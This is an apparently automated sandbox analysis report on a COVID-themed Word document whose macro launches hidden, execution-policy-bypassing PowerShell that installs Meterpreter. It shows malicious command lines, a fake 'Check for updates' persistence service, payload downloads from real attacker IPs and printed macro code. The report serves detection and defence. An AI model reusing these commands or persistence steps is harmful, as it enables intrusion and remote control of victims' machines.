Loading ...

Play interactive tourEdit tour

Analysis Report COVID-19.doc

Overview

General Information

Sample Name:COVID-19.doc
Analysis ID:341993
MD5:9f9f50f3c32ee660a8bbe6616dda8b34
SHA1:6c338a10e894bcad8c67e5da332a6cd7f75f35e0
SHA256:9d063fd60d7d0fb2d4d92f0f348bb2397cf80dd8a4fec5680647469b570f2afe

Most interesting Screenshot:

Detection

Meterpreter
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
Yara detected Meterpreter
Bypasses PowerShell execution policy
Contains functionality to change the desktop window for a process (likely to hide graphical interactions)
Document contains an embedded VBA macro which might access itself as a file (possible anti-VM)
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded macro with GUI obfuscation
Document exploit detected (process start blacklist hit)
Found evasive API chain (may stop execution after checking mutex)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for sample
May check the online IP address of the machine
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious Svchost Process
Suspicious javascript / visual basic script found (invalid extension)
Suspicious powershell command line found
Wscript starts Powershell (via cmd or directly)
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains an embedded VBA which reads its own file name (might be used to evade sandboxes)
Document contains embedded VBA macros
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6040 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • wscript.exe (PID: 4248 cmdline: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • powershell.exe (PID: 2804 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 5108 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File 'C:\Users\user\Desktop\COVID-19.ps1' -adminRights 1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 1740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5388 cmdline: 'C:\Windows\system32\cmd.exe' /C sc delete checkupdate MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 2912 cmdline: sc delete checkupdate MD5: 24A3E2603E63BCB9695A2935D3B24695)
          • cmd.exe (PID: 1476 cmdline: 'C:\Windows\system32\cmd.exe' /C sc create checkupdate binpath= '%COMSPEC% /C start %COMSPEC% /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 3064 cmdline: sc create checkupdate binpath= 'C:\Windows\system32\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1' start= delayed-auto DisplayName= 'Check for updates' MD5: 24A3E2603E63BCB9695A2935D3B24695)
          • cmd.exe (PID: 4812 cmdline: 'C:\Windows\system32\cmd.exe' /C sc start checkupdate MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • sc.exe (PID: 3544 cmdline: sc start checkupdate MD5: 24A3E2603E63BCB9695A2935D3B24695)
  • svchost.exe (PID: 2864 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cmd.exe (PID: 5828 cmdline: C:\Windows\SysWOW64\cmd.exe /C start C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5112 cmdline: C:\Windows\system32\cmd.exe /C C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 3828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 5656 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1 MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • svchost.exe (PID: 2460 cmdline: C:\Windows\system32\svchost.exe -k netsvcs MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\d569872345345[1].txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x7e:$sb3: -WindowStyle Hidden
  • 0x145:$sb3: -WindowStyle Hidden
  • 0x73:$sc2: -NoProfile
  • 0x63:$sd2: -NonInteractive
  • 0x445:$se3: -ExecutionPolicy Bypass
C:\Users\user\Documents\20210120\PowerShell_transcript.648351.BCz0DRM3.20210120103110.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x171:$sb3: -WindowStyle Hidden
  • 0x166:$sc2: -NoProfile
  • 0x156:$sd2: -NonInteractive
  • 0x136:$se3: -ExecutionPolicy Bypass

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.793327668.000000000469F000.00000004.00000001.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0xea806:$sb3: -WindowStyle Hidden
  • 0xea7fb:$sc2: -NoProfile
  • 0xea7eb:$sd2: -NonInteractive
  • 0xea7cb:$se3: -ExecutionPolicy Bypass
00000004.00000002.789971993.0000000000B70000.00000004.00000020.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x391e:$sb3: -WindowStyle Hidden
  • 0x3913:$sc2: -NoProfile
  • 0x3903:$sd2: -NonInteractive
  • 0x38e3:$se3: -ExecutionPolicy Bypass
00000001.00000003.656718758.0000000005DD3000.00000004.00000040.sdmpPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0xdc2:$sb3: -WindowStyle Hidden
  • 0xe89:$sb3: -WindowStyle Hidden
  • 0x41de:$sb3: -WindowStyle Hidden
  • 0x42a5:$sb3: -WindowStyle Hidden
  • 0xdb7:$sc2: -NoProfile
  • 0x41d3:$sc2: -NoProfile
  • 0xda7:$sd2: -NonInteractive
  • 0x41c3:$sd2: -NonInteractive
  • 0x1189:$se3: -ExecutionPolicy Bypass
  • 0x45a5:$se3: -ExecutionPolicy Bypass
00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmpHKTL_Meterpreter_inMemoryDetects Meterpreter in-memorynetbiosX, Florian Roth
  • 0x4a24:$s1: WS2_32.dll
  • 0x4b50:$s2: ReflectiveLoader
00000011.00000002.925627903.00000000004C0000.00000040.00000001.sdmpReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedunknown
  • 0x4b50:$s1: ReflectiveLoader
  • 0x4b4f:$s3: ?ReflectiveLoader@@
Click to see the 8 entries

Unpacked PEs

SourceRuleDescriptionAuthorStrings
17.2.svchost.exe.4c0000.0.raw.unpackHKTL_Meterpreter_inMemoryDetects Meterpreter in-memorynetbiosX, Florian Roth
  • 0x4a24:$s1: WS2_32.dll
  • 0x4b50:$s2: ReflectiveLoader
17.2.svchost.exe.4c0000.0.raw.unpackReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedunknown
  • 0x4b50:$s1: ReflectiveLoader
  • 0x4b4f:$s3: ?ReflectiveLoader@@
17.2.svchost.exe.4c0000.0.raw.unpackPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x42b4:$sb3: -WindowStyle Hidden
  • 0x42a9:$sc2: -NoProfile
  • 0x4299:$sd2: -NonInteractive
  • 0x4279:$se3: -ExecutionPolicy Bypass
17.2.svchost.exe.4c0000.0.unpackHKTL_Meterpreter_inMemoryDetects Meterpreter in-memorynetbiosX, Florian Roth
  • 0x3824:$s1: WS2_32.dll
  • 0x3950:$s2: ReflectiveLoader
17.2.svchost.exe.4c0000.0.unpackReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedunknown
  • 0x3950:$s1: ReflectiveLoader
  • 0x394f:$s3: ?ReflectiveLoader@@
Click to see the 2 entries

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp, CommandLine: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp, CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, ParentProcessId: 6040, ProcessCommandLine: wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp, ProcessId: 4248
Sigma detected: Suspicious Svchost ProcessShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\system32\svchost.exe -k netsvcs, CommandLine: C:\Windows\system32\svchost.exe -k netsvcs, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5656, ProcessCommandLine: C:\Windows\system32\svchost.exe -k netsvcs, ProcessId: 2460

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Machine Learning detection for sampleShow sources
Source: COVID-19.docJoe Sandbox ML: detected

Compliance:

barindex
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
Source: global trafficDNS query: name: ifconfig.me
Source: global trafficTCP traffic: 192.168.2.4:49715 -> 78.141.194.181:80
Source: global trafficTCP traffic: 192.168.2.4:49715 -> 78.141.194.181:80

Networking:

barindex
Yara detected MeterpreterShow sources
Source: Yara matchFile source: 17.2.svchost.exe.4c0000.0.unpack, type: UNPACKEDPE
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: ifconfig.me
Source: Joe Sandbox ViewIP Address: 216.239.32.21 216.239.32.21
Source: Joe Sandbox ViewIP Address: 216.239.32.21 216.239.32.21
Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox ViewASN Name: ALEXHOSTMD ALEXHOSTMD
Source: global trafficHTTP traffic detected: GET /d569872345345.txt HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.141.194.181Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /c7mnnlrmfut6g1erfewlxlxniyo.php HTTP/1.1Host: 45.67.229.125User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Accept: */*
Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: ifconfig.meUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: */*Connection: close
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 78.141.194.181
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: unknownTCP traffic detected without corresponding DNS query: 45.67.229.125
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C300C recv,17_2_004C300C
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 20 Jan 2021 09:30:47 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Fri, 25 Dec 2020 16:29:47 GMTETag: "5a7-5b74c6eccbba7-gzip"Accept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 772Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/plainData Raw: 1f 8b 08 00 00 00 00 00 00 03 85 54 6d 6f d3 30 10 fe dc fc 8a 53 55 94 56 c8 d9 ba 96 31 8a f6 61 94 01 95 d8 5a 2d 88 7d 60 08 79 ce b5 31 24 76 b0 9d 6e 15 f4 bf 73 76 32 68 11 2f 91 92 d8 be b7 e7 9e bb 73 c5 0d 2f fb 1f 66 ca 8d 8e 3e f6 78 56 4a 75 25 57 b9 b3 70 0a 87 83 48 2e fb b0 77 ca f0 2b 1c c2 20 fa 16 75 7a dc ac bc 5a cc ce ef 51 d4 4e 6a b5 d0 85 14 1b 78 b1 a9 b8 25 dd 4b fd 56 af b4 ff 2b 0a 80 86 0b 27 d7 e8 f7 0b a3 97 b2 a0 e5 b5 54 99 be 4b dd 86 36 6f 64 96 a1 02 f6 ca 4b ba 31 3c 86 de c5 66 a6 d6 5a 70 ef 3c f9 b5 bc e4 25 92 38 ee 02 db 05 37 8c 09 95 a9 95 c2 8c 70 f5 96 bc b0 18 75 ee 72 f2 d7 07 a6 b4 83 07 e9 20 ea 50 06 9d 77 66 43 5f bf ea a4 8e 1b c7 08 97 40 0f dd 63 58 70 97 43 b7 d2 77 68 6c 8e 45 91 e0 3d 52 c4 33 b3 aa 4b 54 ee ad b4 e4 30 90 f0 c7 34 de a3 b9 85 ab 5a 9d 59 ef 7f 07 97 33 35 c1 ea 6c e9 9d 72 27 f2 16 02 ed b7 d1 16 22 24 d4 f0 2d 02 7a 7a f3 f4 cc 88 5c 3a 14 ae 36 48 c6 fd d7 e8 d8 75 29 e7 b7 9f e9 0c d8 b4 f0 4c 53 f8 d1 d1 a7 79 45 14 3b a9 56 e9 c6 3a 2c e1 3b a4 58 90 16 6b 95 e9 f9 cd 1f 3b 37 46 9b 33 e1 39 85 d4 e9 6a 90 ec 6b 04 14 72 09 fd df 91 b0 f3 af 10 1f 8f d9 ad 74 f1 a0 45 fb f0 f4 aa ca e6 ba f4 70 e3 e9 e4 a6 e1 c6 de 10 aa eb f9 f5 f1 f8 e1 60 e1 89 4d 3d b1 37 eb 61 72 18 07 1f 5b d8 49 ff ff 0e 29 cd d1 d1 bf 1d 46 0d 93 b5 29 c8 bc 9b 3b 57 4d 0e 0e 9e 9e 24 c3 f1 30 19 3e 1b 27 c3 93 e1 81 1d 8d 9f 9d 3c 1d 8f 9e d0 37 71 f7 ae db 1a 65 d6 85 66 3c 85 0f 4d b0 64 36 4f 7c 5b 7c 9c 4c a8 10 57 9c e2 96 5e c3 37 64 7f e0 5b 32 a9 ec b0 89 dc 5b 36 a6 3f d1 93 f4 26 74 75 eb b6 09 32 2b 2b 4d 9d 77 a1 b3 9a d4 5f 48 67 df 19 ae ec 12 4d 10 37 7d b9 7b 0c 2c d5 b5 11 d8 e4 c4 5e a2 a5 9a 87 b1 68 42 b6 d8 2d 9a b5 14 1e 00 c4 56 80 30 c8 1d 82 c8 51 7c a9 ab cc af 6f a5 aa 28 17 62 e5 d1 74 7e 91 2e ce a7 8f e0 60 0a d6 47 84 bd a3 80 7a 37 8d fd a1 80 bf de 00 81 bd 60 1d c8 08 23 1b fc 9f 42 86 05 df 60 c6 78 ed 34 bc 94 b6 a2 ad a7 91 e0 4c 3d 48 58 6a 03 0d 52 db 6d 19 15 a5 1f a0 2e fd 42 58 0f 56 78 47 b8 9f d9 f3 1d 85 07 1e 9e ef 1b 35 49 ee da b4 35 f7 97 cc 17 a4 84 2a 43 17 81 27 95 4d 75 59 52 a5 43 f8 06 47 65 f4 aa 6d 8c 9e 15 46 56 6e 52 ee de 54 17 9b d6 26 34 4b b0 b9 c2 52 af 91 cd fc 60 fe b2 67 af b4 af e4 fe 1c 92 40 b9 82 5c 28 2a 2c 5d 15 d1 36 fa 01 72 ee da 87 a7 05 00 00 Data Ascii: Tmo0SUV1aZ-}`y1$vnsv2h/s/f>xVJu%WpH.w+ uzZQNjx%KV+'TK6odK1<fZp<%87pur PwfC_@cXpCwhlE=R3KT04ZY35lr'"$-zz\:6Hu)
Source: global trafficHTTP traffic detected: GET /d569872345345.txt HTTP/1.1Accept: */*Accept-Language: en-usAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 78.141.194.181Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /s34987435987.txt HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Wed, 23 Dec 2020 13:46:16 GMTUser-Agent: Microsoft BITS/7.8Host: 78.141.194.181
Source: global trafficHTTP traffic detected: GET /c7mnnlrmfut6g1erfewlxlxniyo.php HTTP/1.1Host: 45.67.229.125User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Accept: */*
Source: global trafficHTTP traffic detected: GET // HTTP/1.1Host: ifconfig.meUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0Accept: */*Connection: close
Source: unknownDNS traffic detected: queries for: ifconfig.me
Source: svchost.exe, 00000006.00000002.929375850.000001832207E000.00000004.00000001.sdmpString found in binary or memory: http://78.141.194.181/
Source: COVID-19.docString found in binary or memory: http://78.141.194.181/d5698723
Source: wscript.exe, 00000001.00000002.657537766.0000000003936000.00000004.00000040.sdmp, COVID-19.doc, COVID-19.tmp.0.drString found in binary or memory: http://78.141.194.181/d569872345345.txt
Source: COVID-19.docString found in binary or memory: http://78.141.194.181/d569872345345.txt$$
Source: svchost.exe, 00000006.00000002.927329386.000001831D313000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.926379288.000001831CA3D000.00000004.00000001.sdmp, d569872345345[1].txt.1.drString found in binary or memory: http://78.141.194.181/s34987435987.txt
Source: svchost.exe, 00000006.00000002.926379288.000001831CA3D000.00000004.00000001.sdmpString found in binary or memory: http://78.141.194.181/s34987435987.txt757AE1B
Source: edb.log.6.drString found in binary or memory: http://78.141.194.181/s34987435987.txt7C:
Source: powershell.exe, 00000004.00000002.794647491.0000000004979000.00000004.00000001.sdmpString found in binary or memory: http://78.141.194.181/s34987435987.txtx
Source: svchost.exe, 00000006.00000002.929327170.0000018322066000.00000004.00000001.sdmpString found in binary or memory: http://78.141.194.181:80/s34987435987.txt
Source: powershell.exe, 00000002.00000002.702993895.0000000000FB8000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.790102113.0000000000BA6000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 00000006.00000002.929781703.0000018322330000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000002.00000002.705342342.0000000004ED1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793030596.0000000004651000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000003.696878950.0000000000F48000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.705793557.0000000005012000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.745071081.00000000087C1000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.793857324.0000000004794000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.709326667.0000000005F30000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004C2BAB OpenWindowStationA,GetProcessWindowStation,SetProcessWindowStation,OpenInputDesktop,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetDesktopWindow,GetWindowDC,CreateCompatibleDC,GetWindowRect,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,17_2_004C2BAB

System Summary:

barindex
Document contains an embedded VBA macro which might access itself as a file (possible anti-VM)Show sources
Source: COVID-19.docOLE, VBA macro line: f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")
Source: COVID-19.docOLE, VBA macro line: f = ActiveDocument.Path + "\" + Replace(ActiveDocument.Name, ".doc", "")
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: COVID-19.docOLE, VBA macro line: c = "wscript /e:jscript " + f
Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open, String wscript: c = "wscript /e:jscript " + fName: Document_Open
Document contains an embedded macro with GUI obfuscationShow sources
Source: COVID-19.docStream path 'Macros/UserForm1/o' : Found suspicious string wscript.shell in non macro stream
Source: COVID-19.docStream path 'Macros/UserForm1/o' : Found suspicious string activexobject in non macro stream
Source: COVID-19.docStream path 'Macros/UserForm1/o' : Found suspicious string scripting.filesystemobject in non macro stream
Suspicious javascript / visual basic script found (invalid extension)Show sources
Source: unknownProcess created: C:\Windows\SysWOW64\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmp
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\wscript.exe wscript /e:jscript C:\Users\user\Desktop\COVID-19.tmpJump to behavior
Wscript starts Powershell (via cmd or directly)Show sources
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -File C:\Windows\SysWOW64\WindowsPowerShell\v1.0\rhedxdcy.z3u.ps1Jump to behavior
